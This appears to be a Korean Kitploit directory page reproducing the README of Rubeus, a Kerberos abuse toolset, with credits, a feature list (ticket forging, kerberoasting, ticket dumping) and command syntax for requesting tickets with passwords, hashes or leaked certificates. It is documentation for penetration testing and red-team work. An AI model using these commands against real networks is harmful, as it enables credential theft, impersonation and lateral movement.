Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Rubeus — 세 머리 개를 길들이려는 중. | Kitploit
도구/GitHubGitHub/ghostpack/rubeus
Privilege EscalationPersistence MechanismsVulnerability AnalysisExploitationLateral MovementPost-ExploitationPenetration TestingAuthenticationRed TeamingLateral Movement #3위
5.1k8988310개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Persistence Mechanisms #17위
Post-Exploitation #5위
Red Teaming #11위
GitHubghostpack/rubeus

Rubeus

세 머리 개를 길들이려는 중.

저장소 보기

Rubeus


Rubeus는 원시 Kerberos 상호작용 및 남용을 위한 C# 도구 세트입니다. Benjamin Delpy의 Kekeo 프로젝트(CC BY-NC-SA 4.0 라이선스)와 Vincent LE TOUX의 MakeMeEnterpriseAdmin 프로젝트(GPL v3.0 라이선스)에서 크게 차용되었습니다. 무기화의 어려운 부분을 해결한 Benjamin과 Vincent에게 모든 공을 돌립니다. 그들의 선행 작업이 없었다면 이 프로젝트는 존재하지 않았을 것입니다.

Charlie Clark과 Ceri Coburn은 Rubeus 코드베이스의 공동 개발자로서 중요한 기여를 했습니다. Elad Shamir는 리소스 기반 제한 위임을 위한 필수 작업을 기여했습니다. 그들의 작업에 매우 감사드립니다!

Rubeus는 또한 Thomas Pornin의 "MIT-like" 라이선스로 출시된 DDer라는 C# ASN.1 구문 분석/인코딩 라이브러리를 사용합니다. 깔끔하고 안정적인 코드를 제공한 Thomas에게 큰 감사를 드립니다!

PKINIT 코드는 @SteveSyfuhs의 Bruce 도구에서 크게 차용되었습니다. Bruce는 RFC4556(PKINIT)을 훨씬 이해하기 쉽게 만들었습니다. Steve에게 큰 감사를 드립니다!

Kerberos PAC의 NDR 인코딩 및 디코딩은 @tiraniddo의 NtApiDotNet 라이브러리를 기반으로 합니다. James에게 감사드립니다.

Kerberoasting을 위한 KerberosRequestorSecurityToken.GetRequest 메서드는 @machosec이 PowerView에 기여한 후 Rubeus에 통합되었습니다.

@harmj0y는 이 코드베이스의 주요 저자입니다.

Rubeus는 BSD 3-Clause 라이선스로 제공됩니다.

Table of Contents

  • Rubeus
    • Table of Contents
    • 배경
      • 명령줄 사용법
      • Opsec 참고 사항
        • 개요
        • 무기화
        • 예제: 자격 증명 추출
        • 예제: Over-pass-the-hash
    • 티켓 요청 및 갱신
      • asktgt
      • asktgs
      • renew
      • brute|spray
    • 제한된 위임 남용
      • s4u
    • 티켓 위조
      • golden
      • silver
      • diamond
    • 티켓 관리
      • ptt
      • purge
      • describe
    • 티켓 추출 및 수집
      • triage
      • klist
      • dump
      • tgtdeleg
      • monitor
      • harvest
    • 로스팅
      • kerberoast
        • kerberoasting opsec
        • 예제
      • asreproast
    • 기타
      • createnetonly
      • changepw
      • hash
      • tgssub
      • currentluid
      • logonsession
      • asrep2kirbi
      • kirbi
    • 컴파일 지침
      • 다른 .NET 버전 대상
      • 참고: Rubeus를 라이브러리로 빌드
      • 참고: PowerShell을 통해 Rubeus 실행
        • 참고 참고: PSRemoting을 통해 Rubeus 실행

배경

명령줄 사용법

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3


 티켓 요청 및 갱신:

    사용자 비밀번호/해시를 기반으로 TGT를 검색하고, 선택적으로 파일에 저장하거나 현재 로그온 세션 또는 특정 LUID에 적용합니다:
        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    사용자 비밀번호/해시를 기반으로 TGT를 검색하고, 선택적으로 파일에 저장하거나 현재 로그온 세션 또는 특정 LUID에 적용합니다:
        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    사용자 비밀번호/해시를 기반으로 TGT를 검색하고, /netonly 프로세스를 시작한 후 티켓을 새 프로세스/로그온 세션에 적용합니다:
        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    PCKS12 인증서를 사용하여 TGT를 검색하고, /netonly 프로세스를 시작한 후 티켓을 새 프로세스/로그온 세션에 적용합니다:
        Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    사용자 키 저장소(스마트 카드)에서 인증서의 지문 또는 주제를 지정하여 TGT를 검색하고, /netonly 프로세스를 시작한 후 티켓을 새 프로세스/로그온 세션에 적용합니다:
        Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/suppenctype:DES|RC4|AES128|AES256] [/nowrap]

    changepw 명령을 사용하여 만료된 비밀번호로 계정을 변경하기에 적합한 TGT를 검색합니다:
        Rubeus.exe asktgt /user:USER </password:PASSWORD /changepw [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/proxyurl:https://KDC_PROXY/kdcproxy]

    사전 인증 데이터를 보내지 않고 TGT를 요청합니다:
        Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    AS-REQ를 사용하여 서비스 티켓을 요청합니다:
        Rubeus.exe asktgt /user:USER /service:SPN </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

   하나 이상의 SPN에 대한 서비스 티켓을 검색하고, 선택적으로 티켓을 저장하거나 적용합니다:
        Rubeus.exe asktgs </ticket:BASE64 | /ticket:FILE.KIRBI> </service:SPN1,SPN2,...> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

Kerberos 키 목록 요청 옵션을 사용하여 서비스 티켓을 검색합니다:
    	Rubeus.exe asktgs /keyList /service:KRBTGT_SPN </ticket:BASE64 | /ticket:FILE.KIRBI> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

위임된 관리 서비스 계정 티켓을 검색합니다:
    	Rubeus.exe asktgs /dmsa /opsec /service:KRBTGT_SPN /targetuser:DMSA_ACCOUNT$ </ticket:BASE64 | /ticket:FILE.KIRBI> [/dc:DOMAIN_CONTROLLER_Win2025] [/outfile:FILENAME] [/ptt] [/nowrap] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

    TGT를 갱신하고, 선택적으로 티켓을 적용, 저장하거나 renew-till 한도까지 자동 갱신합니다:
        Rubeus.exe renew </ticket:BASE64 | /ticket:FILE.KIRBI> [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/autorenew] [/nowrap]
도구 다운로드